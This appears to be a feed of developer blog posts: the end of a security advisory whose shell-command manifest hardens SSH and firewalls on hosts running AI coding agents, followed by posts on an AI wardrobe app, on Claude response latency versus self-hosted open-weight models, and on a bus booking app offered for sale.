    Run: sudo sed -i 's/^PasswordAuthentication yes/PasswordAuthentication no/' \
      /etc/ssh/sshd_config
    Run: sudo systemctl restart sshd
    REPORT: "SSH password authentication disabled. Key-only access."

IF PLATFORM=macos:
  Run: sudo systemsetup -getremotelogin
  IF Remote Login is on:
    ASK_USER: "SSH is enabled. Do you need remote SSH access to this
    machine? (yes/no)"
    IF no:
      Run: sudo systemsetup -setremotelogin off
      REPORT: "SSH disabled entirely."
    IF yes:
      Run: sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' \
        /etc/ssh/sshd_config
      Run: sudo launchctl stop com.openssh.sshd
      Run: sudo launchctl start com.openssh.sshd
      REPORT: "SSH password authentication disabled. Key-only access."

---

### Step 7: Verify remediation
IF PLATFORM=linux:
  Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
  Run: sudo ufw status verbose
  Run: systemctl is-active fail2ban

IF PLATFORM=macos:
  Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
  Run: sudo fdesetup status

REPORT: "Remediation complete. Summary:"
REPORT: "- Agent bind address: [current binding]"
REPORT: "- Firewall: [status]"
REPORT: "- SSH hardening: [status]"
REPORT: "- Host hardening: [status]"
REPORT: "- Tunnel: [configured/not configured]"
REPORT: "- Disk encryption: [status, macOS only]"

---

### What this manifest does NOT cover (requires manual review)
- Layer 2 (Zero Trust Access): Requires Cloudflare dashboard configuration
  for identity provider integration. See the full article for policy setup.
- Layer 5 (MCP permission scoping): Requires agent-specific configuration
  based on your tool chain. See the full article for examples.
- Supply chain audit: Review installed packages manually.
  Run: pip list / npm list -g / cargo install --list
- Credential rotation: If your agent was exposed, assume all environment
  variables, SSH keys, and API tokens accessible to the agent process are
  compromised. Rotate them.

This is the first security advisory we've published with an agent-executable remediation manifest. We believe every security disclosure that tells developers what to do should let their tools do it for them. We'll be publishing these with every advisory going forward.

The architecture we built

We built FORGE because we were setting up AI coding agent infrastructure for clients and kept solving the same security problems from scratch — every time. Cloudflare Tunnel configuration. Zero Trust access policies. WebSocket cookie conflicts. Kernel hardening. MCP server scoping. The same 1,000 lines of battle-tested bash with rollback on failure.

FORGE implements all five layers described in this article as a single deployment script. One command. Under 10 minutes. The agent runs on your VPS, behind your tunnel, gated by your identity, hardened to CIS baselines, with MCP servers pre-configured and scoped.

It is not a hosted service. You own the server. You own the code. You own the infrastructure. The $47 Developer Edition buys the architecture, security model, and deployment automation. Your VPS costs about $7/month. There is no recurring fee to us.

We built it because the gap between "start the server" and "run the server securely" should not require 1,000 lines of infrastructure automation that every developer has to figure out from scratch. FORGE closes that gap.

Sources

  1. CVE-2026-22812. National Vulnerability Database (NVD/NIST). CVSS 8.8. Unauthenticated remote code execution in OpenCode HTTP server.
  2. CVE-2026-22813. National Vulnerability Database (NVD/NIST). CVSS 9.6. Cross-site scripting to remote code execution via unsanitized LLM output in OpenClaw web UI.
  3. 220,000+ exposed instances. Cumulative findings from Censys, Bitsight, Bitdefender, and Penligent internet-wide scans, January–March 2026.
  4. 15,200 confirmed RCE-vulnerable instances. Penligent research report, Q1 2026.
  5. 53,300 instances correlated with breach activity. SecurityScorecard STRIKE team analysis, Q1 2026.
  6. 1,184 malicious ClawHub packages. CyberDesserts supply chain analysis, February 2026.
  7. 1.5 million leaked API tokens and 35,000 email addresses. Infosecurity Magazine report on Supabase breach affecting AI agent deployments, March 2026.
  8. AI agent market $7.8–10.9B (2026), projected $52B by 2030. Industry composite estimates (Gartner, McKinsey, CB Insights).
  9. 92% of US developers use AI coding tools daily. GitHub developer survey, 2026.
  10. 41% of all code is AI-generated. Google internal metrics, reported Q1 2026.
  11. 24.7% of AI-generated code contains security flaws. Snyk Code analysis, 2025–2026.
  12. MCP: 97 million monthly SDK downloads, 10,000+ servers. Linux Foundation MCP governance announcement, March 2026.
  13. Nate B. Jones, "5 Skills" framework. AI News & Strategy Daily, published March 16, 2026. Framework for AI agent management: prompting, context management, iteration, evaluation, deployment.
  14. NVIDIA NemoClaw. GTC 2026 announcement, NVIDIA Newsroom. Enterprise security wrapper for OpenClaw.
  15. Apple Mac Mini supply constraints. M4 and M4 Pro configurations backordered across major retailers, Q1 2026. Developer community reports attribute demand to local AI agent hosting on Apple Silicon unified memory architecture.

About the author

Hodge Luke is the founder of Hodge Luke Digital Intelligence Agency and the creator of FORGE — a security-hardened deployment platform for AI coding agents built on Cloudflare's edge network. FORGE implements the 5-layer defense-in-depth model described in this article as a one-command deployment.

Hodge Luke | Two Guys and some Bots | forge.useacceda.com

I built an AI wardrobe app by myself. Here's what actually happened.

2026-03-31 06:28:14

Solo dev, no funding, one app that needed to work offline and think online. Why the architecture ended up the way it did.

I spent the last several months building an AI-powered wardrobe app called Outfii. No cofounders, no funding, no team. Just me, too much chai, and a mass of decisions I wasn't qualified to make.

You photograph your clothes, the app organizes them, and AI helps you figure out what to wear. It's on Google Play now. Here's how it actually went.

The problem that wouldn't leave me alone

Every morning, same thing. Full closet, nothing to wear. I looked it up and apparently most people regularly use about 20% of what they own. The rest just hangs there.

I don't have a fashion background. But "help me combine clothes I already own" felt like something code could handle. Whether I was the right person to build it is still an open question.

Why the app needs two brains

This is the part that shaped every other decision.

Some things need to happen instantly. When you're flipping through outfit options, you can't be waiting on a server to tell you whether navy and olive work together. That feedback loop needs to be under 50ms or it feels broken.

Other things need actual intelligence. Looking at a photo and figuring out "that's a linen shirt, it's dusty rose, semi-formal" requires a vision model. Suggesting what to wear tomorrow based on your wardrobe, the weather, and what you wore this week requires an LLM.

So the app has two brains. One lives on your phone. One lives in the cloud. They do completely different jobs.

The on-device brain handles color analysis, harmony scoring, and outfit compatibility. I tried doing this in Dart first. It was too slow. Color distance calculations in tight loops, converting between color spaces, running harmony checks across every item pair in a wardrobe. Dart isolates helped but added complexity without solving the core problem: CPU-bound math needs compiled code. I rewrote it in Rust, bridged to Flutter via flutter_rust_bridge. Scoring now runs in ~20-30ms on a mid-range Android phone. The Rust binary adds about 4MB to the APK, which felt worth it.

The scoring algorithm itself went through three complete rewrites. Telling navy from black programmatically is genuinely hard. CIE Delta E gets you close, but perceptual color difference is still messy at the dark end of the spectrum. Your eyes handle this effortlessly. Code does not.

The cloud brain handles understanding. When you scan a clothing item, an edge function sends the photo to a vision model that identifies type, color, pattern, material. When you ask for outfit suggestions, another function builds context from your wardrobe and passes it to an LLM. Different tasks, different models. Cloud response times vary (2-8 seconds depending on the model and task), which is fine because these aren't real-time interactions.

The two never overlap. Scoring is always local. Understanding is always cloud. This means the core app works offline, which matters a lot in India where connectivity is unpredictable.

The BYOK question

AI features cost money to run. I'm bootstrapped. Subsidizing API calls for every user isn't sustainable.

So I built a bring-your-own-key system. Users can plug in their own OpenAI or Anthropic API key and get the full AI experience without paying me a subscription. Keys are encrypted on the phone and never touch our servers in plaintext. There's also paid tiers for people who don't want to think about API keys.

This was controversial in my head for a while. "Asking users to get their own API key" sounds like terrible UX. But it turns out there's a niche of technical users who actually prefer this. They like knowing exactly what model runs, what it costs, and that their data goes to the provider they chose. It's not for everyone, but it's a real segment.

Everything lives on your phone first

The wardrobe is stored locally in SQLite. Not as a cache. As the source of truth.

I didn't want the app to break when you lose signal. You should be able to browse your wardrobe, check outfit history, and get scoring results in airplane mode. Cloud sync happens in the background when you're online.

The downside is sync conflicts. Two devices editing the same wardrobe creates problems I'm still working through. Last-write-wins is what I ship with for now, but it's not great when someone adds items on a tablet and a phone simultaneously. Solving this properly is on the list.

What went wrong

I shipped too many features at launch. Wardrobe management, AI outfits, weather integration, trip packing, laundry tracking, wear reminders, style profiles. That's three apps pretending to be one. Should've shipped wardrobe + AI outfits and added the rest over time.

My Play Store screenshots were raw app captures. Status bars visible. Timestamps. Battery icons. No marketing framing. People decide whether to install your app in about two seconds of scrolling, and I gave them nothing to work with. Still fixing this weeks later.

Debugging across the Rust bridge was also painful early on. When something panics in Rust, the error you get on the Flutter side is not always helpful. I spent a full day on a crash that turned out to be a type mismatch in the FFI layer that codegen silently accepted. Added a lot of defensive logging after that.

I also copy-pasted boilerplate across backend functions for months before building a shared utilities layer. Auth middleware, response helpers, error formatting, all duplicated. Embarrassing but honest.

What went right

The blog was a good early bet. I wrote about color theory in fashion, capsule wardrobe math, pattern mixing rules. Technical content at the intersection of fashion and algorithms. Five posts, bringing in organic search traffic before anyone even downloads the app.

The on-device scoring engine was painful to set up but it's a genuine differentiator. Most wardrobe apps send every request to a server. Having instant, offline scoring on a 29MB app feels noticeably better. Users don't know it's Rust running on their phone. They just know it's fast.

Where it's going

Social features are rolling out. Users can share outfit combinations. After that, iOS and a web app.

The developer account is under Clarixo, my parent brand. Outfii is the first product. Bootstrapped, planning to stay that way.

If you want to try it: outfii.in

Play Store: Outfii - AI Wardrobe Stylist

If you're building solo, optimize for decisions you can live with for a while. The architecture won't be perfect. Ship the version that's good enough, then fix the parts that actually hurt.

Claude Feels Slow. But Is Moving a Team to Open-Weight Models Actually the Fix?

2026-03-31 06:21:51

TL;DR

Claude has a real speed problem for our team — but mostly in TTFT, not in raw decoding speed.

I measured our actual usage and found this:

  • TTFT p50: 4.2s–6.8s
  • TTFT p90: 14.5s–28.1s
  • Claude Sonnet decode p50: 176 tok/s

That explains the feeling: Claude often isn’t that slow once it starts, but sometimes it takes so long to begin that the whole thing feels like it’s crawling.

That naturally raises the next question:

Should we move the team to self-hosted open-weight models?

At first glance, that sounds promising. Self-hosted setups can have dramatically better TTFT. In the numbers I looked at, open-weight deployments were often estimated around 150–600ms TTFT, versus Claude’s 4–7s median in our real usage.

But once I looked at the actual team setup — 10 engineers sharing one GPU budget — the answer stopped looking obvious.

The best open-weight models need serious multi-GPU infra, and once that infra is shared, the speed case starts looking surprisingly shaky.

So this post is not “open source bad.”

It’s a narrower question:

If Claude feels slow, is moving a team to open-weight models on shared infra actually the answer?

Right now, I’m not convinced.

The problem: Claude feels like it crawls

This started with a very practical complaint:

Claude is slow.

That could mean a lot of things, so I measured it.

From about 50 session files and roughly 3,000 API calls, the problem was clear: the main issue was TTFT, especially in the tail.

TTFT from our real usage

Trigger p10 p50 p90
User message 2.8s 6.8s 28.1s
Tool result 2.5s 4.2s 14.5s

That 28.1s p90 is the whole story.

Claude is not just “a bit laggy” there. It’s slow enough to break flow.

The surprising part: decode speed wasn’t the main problem

Here’s the other half of the picture.

Generation speed

Metric p10 p50 p90
Decode tok/s (excluding TTFT) 72 178 567
Wall tok/s (including TTFT) 23 41 63

And per model:

Model TTFT p50 Decode p50
Haiku 4.5 1.8s 287 tok/s
Sonnet 4.6 4.2s 176 tok/s
Opus 4.6 4.7s 130 tok/s

So the core problem wasn’t really:

Claude can’t stream fast enough.

It was:

Claude often takes too long to get started.

That distinction matters, because it makes self-hosting sound much more attractive than it might actually be.

Why open weights sound like the obvious answer

If TTFT is the problem, then self-hosting sounds like the clean fix.

The pitch is simple:

  • no provider-side queue
  • no shared API congestion
  • your own inference server
  • much lower TTFT

And the numbers I collected from the self-hosting side were definitely seductive.

Best-case self-hosted framing

Metric Claude now Best self-hosted
Tool-triggered TTFT p50 4,200ms ~160ms
User-triggered TTFT p50 6,800ms ~160ms
Bad-day p90 14,500ms+ <400ms

If TTFT were the only thing that mattered, I think this would already be enough to move seriously toward GPUs.

But TTFT is not the whole developer experience.

The models we’d actually consider

We’re not talking about toy models here. We’re talking about the real open-weight candidates people would actually put on the table.

Models considered

Model Why consider it?
Qwen3-Coder-Next Fast MoE coding model, 80B total / 3B active
MiniMax M2.5 Stronger quality candidate, 230B total / 10B active
DeepSeek V3.2 Very large MoE option
Qwen3.5-27B Dense, simpler, slower but cheaper

And the inference engines are the standard ones you’d expect:

Inference engines

Model family Realistic inference engine
Qwen / DeepSeek vLLM or SGLang
MiniMax M2.5 vLLM
Dense smaller models usually vLLM

That means this isn’t some hypothetical future stack. It’s the standard modern self-hosted inference path.

The part that makes this much less exciting: GPU budgets are shared

This is the piece I think gets hand-waved away too often.

Our current setup is:

Item Value
Engineers 10
Claude subscription per engineer $150/mo
Total Claude cost $1,500/mo

The budget I was willing to entertain for self-hosting was roughly 3× that, so about $4,500/month.

That sounds like a lot.

But for top open-weight coding models, it buys you something like this:

What the budget can buy

Config Cost/month Notes
5× H100 on Vast.ai $4,712 Enough for MiniMax M2.5 / DeepSeek-class INT4
3× H100 on Lambda $4,521 More reliable, lower GPU count
4× H200 on Vast.ai $4,153 Better memory bandwidth
8× A100 on Vast.ai $2,580 Cheapest high-count option

That’s not “10 engineers each get a fast private model.”

That’s one shared cluster.

And that changes the question completely.

The real metric is not TTFT. It’s team step time.

The right equation is not:

lower TTFT = faster experience

It’s more like:

team step time = queueing + TTFT + output_tokens / decode_speed

That’s the part that made me hesitate.

Because once you share one cluster across 10 engineers:

  • TTFT might improve
  • but per-user decoding might not
  • and queueing becomes part of the story

That is a very different situation from “look how fast this benchmark is on one box.”

Why I’m not yet sold

The self-hosted numbers I gathered looked like this:

Self-hosted decode estimates I considered

Model Config INT4 decode tok/s
Qwen3-Coder-Next 2× H100 ~3,400
MiniMax M2.5 4× H100 ~2,000
MiniMax M2.5 2× H100 ~1,000
DeepSeek V3.2 5× H100 ~700
Qwen3.5-27B 2× H100 ~380
Qwen3.5-27B 1× H100 ~190

Those numbers are exciting. They make open weights look like a no-brainer.

But they also raise exactly the question I still don’t think I’ve answered cleanly:

Are these the numbers one engineer feels, or the numbers a shared cluster produces in aggregate?

Because for a 10-person team, those are not the same thing.

And once I started looking at the problem through the lens of shared infra, the speed case stopped looking like an obvious slam dunk.

So where does that leave me?

I think I’ve convinced myself of a few things:

What seems true

Statement My current view
Claude has a real speed problem Yes
The problem is mostly TTFT Yes
Self-hosting probably improves TTFT a lot Yes
The best open-weight models are expensive to run well Yes
Shared infra weakens the speed story Yes
Moving the whole team looks obviously promising No

That’s the interesting part.

The story I expected was:

Claude is slow, open weights are fast, buy GPUs, problem solved.

The story I actually found was:

Claude is slow mostly because of TTFT.
Open weights probably help that.
But once the infra is shared across a team, the speed case gets much less clean.

Bottom line

I started with a very simple frustration:

Claude felt slow.

I measured it and found a very specific issue:

TTFT, especially the p90 tail, was bad enough to make the whole experience feel like it was crawling.

That led to the obvious next idea:

What if we just move to open-weight models on our own GPUs?

And right now, my answer is not “definitely no.”

It’s this:

Open-weight models look promising for TTFT.

They look much less promising as a shared-infra speed fix for a whole team.

That’s the question I’m left with.

Not whether open weights are good.
Not whether they’re possible.
But whether they really solve the problem we actually have.

I built a Real-time Bus Reservation System with React &amp; FastAPI 🚍

2026-03-31 06:20:01

Hey DEV community! 👋

For the past few weeks, I wanted to build something that solves a complex real-world problem. So, I built a complete "SaaS-in-a-box" Bus Reservation platform called Ani Travels.

My main challenge was handling concurrency—making sure two people looking at the same open seat cannot book it simultaneously.

🛠 The Tech Stack

  • Frontend: React (Vite) + Tailwind CSS + Framer Motion (Added smooth page transitions and interactive seat mapping).
  • Backend: Python FastAPI (I fell in love with how fast and easy the asynchronous execution is).
  • Database: MongoDB.
  • Real-time Locking: WebSockets! As soon as a user selects a seat, an event is fired and the seat is locked across all active sessions instantly.

🌟 Features Implemented

  • Search bus routes and see results dynamically.
  • Interactive visual UI for Seat Selection (like MakeMyTrip/Redbus).
  • Checkout forms and backend payment processing flow.
  • A fully functional Admin Dashboard to add complete routes, assign buses, and monitor all platform bookings.

You can play around with the Live Demo here:
🔗 https://ani-travels-bus-booking.vercel.app

(Since the backend is on Render free tier, please excuse the initial 50-second cold start!)

I am selling the Complete Source Code along with detailed setup instructions if any entrepreneur or dev wants to skip 100+ hours of coding and launch their own startup/project immediately. It comes with seed scripts to populate DB instantly.

👉 Get the Full Source Code from my Gumroad

Would love to hear constructive feedback! How do you handle complex booking architectures in your apps?